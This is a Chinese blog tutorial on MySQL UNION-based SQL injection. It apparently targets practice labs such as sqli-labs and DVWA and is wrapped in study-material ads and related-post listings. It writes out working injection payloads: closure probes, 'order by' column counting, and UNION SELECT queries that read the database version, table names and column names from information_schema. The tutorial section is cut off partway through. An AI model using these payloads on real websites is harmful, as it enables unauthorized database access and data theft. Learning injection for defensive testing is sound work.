sql注入之union联合注入_sql注入union

于 2024-05-17 08:38:02 发布
阅读量733 收藏 7
点赞数 21
分类专栏: 2024年程序员学习 文章标签: 网络安全 web安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84281720/article/details/138991095
版权

一、网安学习成长路线图

网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
在这里插入图片描述

二、网安视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

4、判断真值的方法是指通过构造一个条件语句,利用应用程序返回的结果来判断闭合方式

如果是没有报错回显的情况,则可以用判断真值的方法来判断闭合方式。

例如:输入index.php?id=1’,页面显示错误

再输入index.php?id=1’ --+,页面显示正确
sqli labs 是双引号闭合

dvwa 是单引号闭合

三、以MySQL注入为例

1、在参数后添加引号尝试报错,并用and 1=1#and 1=2#测试报错

?id=1' and 1=1#		页面返回正常
?id=1' and 1=2#		页面返回不正常

2、利用order by猜测字段

使用语句 order by 确定当前表的字符数。
order by 1 如果页面返回正常,字段数不少于1。
order by 2 如果页面返回正常,字段数不少于2。
如此类推,直到页面出错,正确的字段数是出错数字减1。
公式 order by n-1
1' order by 1--空格 正常
1' order by 2--空格 正常
1' order by 3--空格 出错

3、利用union联合查询

-1' union select 1,2--+		--看哪个字段可以显示信息,利用它获取数据库信息
--修改id为一个不存在的id,强行报错
--因为代码默认只返回第一条结果,不会返回 union select 的结果

4、获取数据库信息

-1' union select 1,version()--+

user()		--获取数据库用户名
database()	--获取数据库名
version()	--获取数据库版本信息


--其它信息
@@datadir				--数据库路径
@@version_compile_os	--操作系统版本

5、查询数据库的表

id=-1%27 union select 1,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1)--+


--table_schema=数据库名16进制或者用单引号括起来
--改变limit 0,1中前一个参数,得到所有表

6、查询数据库字段

同样的查询字段也可以通过内置库 information_schema 里的 COLUMNS,这个表记录所有表的字段。通过 COLUMNS 查询 users 表的字段。

获取 users 表第一个字段名:
-1' union select 1,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 1)--+


获取 users 表第二个字段名:


## 学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/7a04c5d629f1415a9e35662316578e07.png#pic_center)



**需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)**

**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
2401_84281720
关注
  • 21
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入——联合查询union
Cwillchris的博客
06-02 430
SQL注入联合查询超详细原理讲解
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
sql注入union联合注入
m0_63436163的博客
01-30 842
联合查询注入联合两个表进行注入攻击,使用关键词 union select 对两个表进行联合查询。两个表的字段数要相同,不然会出现报错。列数相同union 特性是显示两张表 我们就可以吧第一个参数变为------负--的 或者不存在的值 就行了 显示就是以第二张表为主。
SQL-union注入
m0_62886641的博客
04-22 128
burpsuite使用以及union注入,是自己的复习笔记
sql注入-union注入union函数 联合注入
07-11 7276
union注入】可与报错注入、盲注、堆叠注入等方法结合使用
SQL注入-UNION注入
李二胖的博客
04-16 190
SQL注入攻击union注入攻击 union注入攻击 使用wamp构造测试环境 通过以上两步发现数据库表字段数为3随后执行union select 1,2,3,并将ID值设置为-1可以返回union select的结果 在2和3的位置可以执行一些查询命令,在2的位置查询数据库名 得知数据库名后可以进行表名查询 尝试查询字段名 获取字段数据 ...
sql注入讲解ppt.pptx
08-10
2. 联合查询:使用 UNION keyword 来连接两个查询结果。 3. ORDER BY:使用 ORDER BY keyword 来排序查询结果。 4. LIMIT 和 OFFSET:使用 LIMIT 和 OFFSET keyword 来限制查询结果。 八、SQL 注入基本步骤: 1. ...
sql注入_表名、列名字典
05-06
union select * from 表名字典 union select 列名字典 from 表名
Nginx中防止SQL注入攻击的相关配置介绍
09-30
在Nginx中防止SQL注入攻击是保护Web应用程序安全的重要环节。SQL注入是黑客利用恶意SQL语句侵入数据库的一种常见方法。以下是一些相关的配置介绍,这些配置可以帮助你阻止可能的SQL注入尝试。 首先,了解基本思路:...
Sql注入工具_动力节点Java学院整理
09-09
9. **Safe3 SQL Injector**:这款工具是最强大且易于使用的渗透测试工具之一,支持多种数据库系统,自动检测和利用SQL注入,功能包括读取数据库、执行SQL语句、控制后门等。 这些工具的存在,一方面警示我们数据库...
SQL注入(一)之union注入
木尤的博客
07-08 2967
SQL注入(一)之union注入SQL注入的前期,第一件事情就是找到SQL注入点,在找到注入点后开始下面的内容: 一、联合查询法(一) a.判断注入点: and 1=1 --返回true,显示正常 and 1=2 --返回false,显示错误 b.猜多少列 order by [数值] c.联合查询猜表名 union select 1,2,3,……,7 from users --猜表名并记录返回回显位(报错说明表不存在,将表名更换继续猜) d.联合查询猜列名 union select 1,2,u
sql注入(Union注入攻击)
m0_65463546的博客
12-08 1200
这段时间自我摸索着学习了下sql注入,学习的过程中发现了一些小白学习初期可能会犯的错误,也想把自己学习过程中的心得与体会分享给大家,希望能帮助到大家!好了,接下来就开始我们的正题!在数据库中,当我们需要将两个表的查询内容合并到一张表去显示,就需要使用我们的Union去拼接。例如:select 字段1,字段2,字段3 from为什么会报错?即两表查询字段数量不一致。
SQL注入union 联合注入
weixin_53711701的博客
01-16 4259
SQL注入union联合注入
基于Union联合SQL注入
最新发布
m0_64368365的博客
02-06 929
SQL注入是基于在动态构造SQL动态注入语句时未对用户输入进行充分的验证和过滤,攻击者利用这个漏洞通过用户输入插入恶意代码来改变原始SQL查询的逻辑结构从而达到控制数据库的目的。
SQL注入-union注入
cmd3768的博客,b站同号
07-03 160
​。
SQL显错(union注入基础深度剖析(原理)
m0_46304840的博客
03-03 2290
前言 前面基础应该写的差不多了,至于关于编程语言我会后面再写 正文 什么是sql注入sql注入web应用程序没有对用户输入的数据进行判断,导致前端传入后端的参数 可以被攻击者所控制,并且带入数据库执行 $sql = "SELECT * FROM users where id = $GET['id']"; 因为这里的参数,id可以可以控制,所以会被攻击者进行拼接...
N9-SQL注入union注入
尐猴子君ii的博客
04-01 839
今天猴子君要向大家介绍的是SQL注入union章节。 首先打开pikachu渗透测试平台。 找到sql字符型注入的章节。 union语句为数据库联合语句,用法如下: SELECT 字段1,字段2 from 表名 where 条件 union SELECT 字段1,字段2 from 表名 where 条件 而union联合字段后面的查询字段的个数要与前面的字段个数相同,所以我们可以使用 ...
sql注入实战—union注入
qq_40909772的博客
07-12 749
测试网站:自建靶场 http://192.168.57.128:1237/sql/union.php?id=1 测试工具:Burp Suite 1.注入过程。 1.1 访问该地址使用burp抓包,返回的结果如下。 1.2 在URL后添加一个单引号,再次访问,返回的结果与id=1不相同。 1.3 继续修改URL,访问id=1 and 1=1,由于and 1=1为真,所以页面应返回与id=1相同的结果,访问id=1 and 1=2,由于and 1=2为假,所以页面应返回与id=1不同的结果,如下图所示。   由
sql注入union联合查询
05-19
SQL注入是一种针对数据库的攻击方式,攻击者通过构造恶意输入,将SQL语句的语义进行修改,从而达到非法访问、篡改和删除数据等目的。其中,union联合查询就是SQL注入中常用的一种方式。 在SQL语句中,union是用来连接两条或多条select语句的关键字,它可以将两个查询结果合并成一个结果集。攻击者可以通过在输入框中输入一些特殊的字符或者语句,使得SQL语句被修改,例如: ``` SELECT * FROM users WHERE name = 'admin' AND password = '123456' ``` 攻击者可以在输入框中输入如下内容: ``` admin' UNION SELECT 1,2,3,4-- ``` 这样,SQL语句就会变成: ``` SELECT * FROM users WHERE name = 'admin' UNION SELECT 1,2,3,4--' AND password = '123456' ``` 这条SQL语句的含义是:先查询用户名为admin的用户信息,然后将查询结果与1,2,3,4合并成一个结果集。由于这条语句中的1,2,3,4并没有实际意义,所以攻击者可以通过不断尝试,来获取不同的信息。 为了防止SQL注入攻击,开发人员应该对输入的数据进行过滤和验证,特别是对于涉及到数据库操作的输入,更应该进行严格的验证和过滤。一般来说,可以采用参数化查询、白名单过滤、限制字符集等方式来防止SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值